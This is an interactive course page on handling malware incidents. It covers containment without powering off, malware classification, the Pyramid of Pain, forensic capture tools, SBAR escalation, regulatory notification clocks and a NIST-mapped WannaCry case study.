Incident Management — Week 03, Class 1

Handling Malware Incidents

This interactive playbook translates foundational incident response principles into an actionable dashboard. Explore malware classifications, indicator frameworks, strict containment protocols, and historical case analyses to build your active defense capabilities.

⚠️ The Golden Rule

CONTAIN — DO NOT POWER OFF

  • Powering off destroys RAM and forensic timelines.
  • Modern malware may react destructively to shutdown.
  • Rebooting re-engages persistence mechanisms.

1. Threat Intelligence & Classification

Understanding the adversary is the first step in the NIST framework (Detection & Analysis). This section allows you to interactively explore the six core malware families to understand their primary behaviors, and dissect the "Pyramid of Pain" to learn which Indicators of Compromise (IoCs) are most valuable to defend against.

Malware Family Profiler

Virus

Needs a host file; requires user interaction to run. Primary goal is to replicate.

Rule: Classify by primary behaviour right now. Real malware blurs the lines.

The Pyramid of Pain

Click a level to inspect the IoC category. Higher levels cause more pain for attackers to change.

TTPs (Tough!)
Tools (Challenging)
Network / Host Artefacts (Annoying)
Domain Names (Simple)
IP Addresses (Easy)
Hash Values (Trivial)

TTPs (Tactics, Techniques, Procedures)

The highest value IoC. This represents the attacker's fundamental behavior. Forcing them to change TTPs requires them to learn new skills and build new infrastructure.

Example: MITRE ATT&CK techniques, cron job piping to bash.

2. Containment Strategy Matrix

Effective containment operates across three distinct time horizons executed in parallel. This section breaks down the tactical menu for limiting the blast radius of an incident without destroying volatile evidence needed for analysis.

⏱️

Short-term (Minutes)

  • Disable network adapter (NIC down, host up)
  • Block C2 IPs/domains at perimeter
  • Disable suspect user account
  • Quarantine via EDR
💾

System Backup (Parallel)

  • Memory dump (DumpIt, WinPMEM, AVML)
  • Disk image (FTK Imager, dd)
  • Snapshot relevant logs
  • Capture volatile data before long-term actions.
🏗️

Long-term (Hours-Days)

  • Emergency enterprise patches
  • Tighten enterprise firewall rules
  • Reset credentials at scale
  • Deploy IoC detections enterprise-wide

3. Communication & Escalation

Incident response fails when communication breaks down. This section outlines the structure (SBAR), the severity-driven cadence, and the strict regulatory clocks that begin ticking the moment you become aware of a potential breach.

The SBAR Framework

S — Situation: One sentence stating the problem.
B — Background: Two sentences of context.
A — Assessment: Two sentences of analysis/impact.
R — Recommendation: One sentence requesting action.

Channel Integrity

Ranked from highest integrity to "Assume Compromised".

1. Face-to-face
2. Personal mobile, voice call
3. Encrypted OOB (Signal)
4. Personal email (emergency only)
5. Corporate VoIP
6. Corporate Slack/Teams
7. Corporate Email

The Regulatory Clock

Clock starts at awareness, not confirmation. Legal is your first call.

*HIPAA allows up to 60 days (1440 hours) for individual notification, but often requires faster internal action.

4. Real-World Case Studies

History is the best teacher. This interactive dashboard analyzes four major global cyber incidents, mapping their attack vectors and outcomes directly to the NIST IR Lifecycle phases to extract actionable lessons.

WannaCry

Worm + Ransomware

Scale / Impact

200,000+ systems, 150 countries

Attack Vector

SMBv1 RCE via EternalBlue (MS17-010, patched 2 months earlier)

Resolution / Outcome

Stopped by kill-switch domain registered for $10.69.

NIST-Mapped Lessons

  • Preparation Patch management cadence is not optional; Disable SMBv1.
  • Containment Segmentation limits blast radius.
  • Recovery Offline backups beat ransom.